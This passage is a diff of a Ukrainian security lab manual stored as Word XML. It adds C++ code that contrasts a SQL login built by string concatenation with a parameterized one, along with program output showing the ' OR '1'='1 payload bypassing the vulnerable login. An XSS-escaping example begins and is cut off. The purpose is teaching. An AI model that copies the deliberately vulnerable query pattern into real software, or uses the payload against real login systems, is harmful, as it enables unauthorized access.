+            <w:r>
+              <w:t xml:space="preserve">    if (found) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Вхід виконано як: "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 0) &lt;&lt; " (роль "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 1) &lt;&lt; ")\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_finalize(stmt);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return found;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// БЕЗПЕЧНИЙ варіант: структура запиту фіксована, дані передаються</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// окремо через параметри й ніколи не тлумачаться як код SQL</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">bool safeLogin(sqlite3* db, const std::string&amp; login, const std::string&amp; password) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    const char* query = "SELECT login, role FROM users WHERE login=? AND password=?";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Запит:\n  " &lt;&lt; query &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Параметри: ('" &lt;&lt; login &lt;&lt; "', '" &lt;&lt; password &lt;&lt; "')\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_stmt* stmt = nullptr;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_prepare_v2(db, query, -1, &amp;stmt, nullptr);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_bind_text(stmt, 1, login.c_str(), -1, SQLITE_TRANSIENT);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_bind_text(stmt, 2, password.c_str(), -1, SQLITE_TRANSIENT);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    bool found = (sqlite3_step(stmt) == SQLITE_ROW);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    if (found) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Вхід виконано як: "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 0) &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_finalize(stmt);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return found;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">int main() {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3* db = setupDatabase();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "=== Коректний вхід ===\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    vulnerableLogin(db, "admin", "secret123");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "\n=== Атака SQL-ін'єкцією ===\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    // Введене значення закриває лапку й додає умову, істинну завжди</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::string injection = "' OR '1'='1";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    bool bypassed = vulnerableLogin(db, "admin", injection);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "Результат: "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">              &lt;&lt; (bypassed ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено") &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "\n=== Та сама атака на параметризованому запиті ===\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    bool blocked = safeLogin(db, "admin", injection);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "Результат: "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">              &lt;&lt; (blocked ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено") &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_close(db);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return 0;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5132,44 +5155,12 @@
         </w:rPr>
       </w:pPr>
     </w:p>
-    <w:bookmarkEnd w:id="25"/>
-    <w:bookmarkEnd w:id="26"/>
-    <w:bookmarkEnd w:id="27"/>
-    <w:bookmarkStart w:id="28" w:name="порядок-виконання-роботи"/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Порядок виконання роботи</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1004"/>
-        </w:numPr>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Отримати в викладача номер індивідуального варіанта.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1004"/>
-        </w:numPr>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Аналіз мережевого трафіку:</w:t>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Результат роботи програми:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5217,43 +5208,136 @@
               <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">- Встановити Wireshark (якщо не встановлено)</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">- Запустити захоплення трафіку на основному інтерфейсі</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">- Відвідати кілька веб-сайтів (HTTP і HTTPS)</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">- Знайти та проаналізувати HTTP-запити</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">- Застосувати фільтри для виділення трафіку</w:t>
+              <w:t xml:space="preserve">=== Коректний вхід ===</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">[ВРАЗЛИВИЙ] Запит:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  SELECT login, role FROM users WHERE login='admin' AND password='secret123'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">[ВРАЗЛИВИЙ] Вхід виконано як: admin (роль admin)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">=== Атака SQL-ін'єкцією ===</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">[ВРАЗЛИВИЙ] Запит:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  SELECT login, role FROM users WHERE login='admin' AND password='' OR '1'='1'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">[ВРАЗЛИВИЙ] Вхід виконано як: admin (роль admin)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Результат: ЗАХИСТ ОБІЙДЕНО</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">=== Та сама атака на параметризованому запиті ===</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">[БЕЗПЕЧНИЙ] Запит:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  SELECT login, role FROM users WHERE login=? AND password=?</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">[БЕЗПЕЧНИЙ] Параметри: ('admin', '' OR '1'='1')</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Результат: доступ відхилено</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5270,19 +5354,32 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1005"/>
-        </w:numPr>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Подивіться на другий запит: введений «пароль» закрив лапку й дописав умову</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
-          <w:b/>
-          <w:bCs/>
+          <w:rStyle w:val="VerbatimChar"/>
         </w:rPr>
-        <w:t xml:space="preserve">Налаштування брандмауера:</w:t>
+        <w:t xml:space="preserve">OR '1'='1'</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, яка істинна для кожного рядка таблиці. Оскільки AND виконується раніше за OR, запит повертає всі записи, і перший з них — адміністратор. У параметризованому запиті те саме значення лишилося просто рядком символів, який не збігся з жодним паролем.</w:t>
+      </w:r>
+    </w:p>
+    <w:bookmarkEnd w:id="25"/>
+    <w:bookmarkStart w:id="26" w:name="демонстрація-xss-та-захисту"/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Демонстрація XSS та захисту</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5330,43 +5427,259 @@
               <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">- Переглянути поточні правила брандмауера</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">- Створити правило для блокування порту з варіанта</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">- Створити правило для дозволу порту з варіанта</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">- Перевірити роботу правил</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">- Видалити тестові правила</w:t>
+              <w:t xml:space="preserve">#include &lt;iostream&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#include &lt;string&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// Екранування для HTML: символи, що мають у розмітці особливе значення,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// замінюються сутностями, і браузер показує їх як текст, а не виконує</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">std::string htmlEscape(const std::string&amp; input) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::string out;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    for (char c : input) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        switch (c) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">            case '&amp;':  out += "&amp;amp;";  break;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">            case '&lt;':  out += "&amp;lt;";   break;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">            case '&gt;':  out += "&amp;gt;";   break;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">            case '"':  out += "&amp;quot;"; break;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">            case '\'': out += "&amp;#39;";  break;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">            default:   out += c;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        }</w:t>
+            </w:r>
+          </w:p>
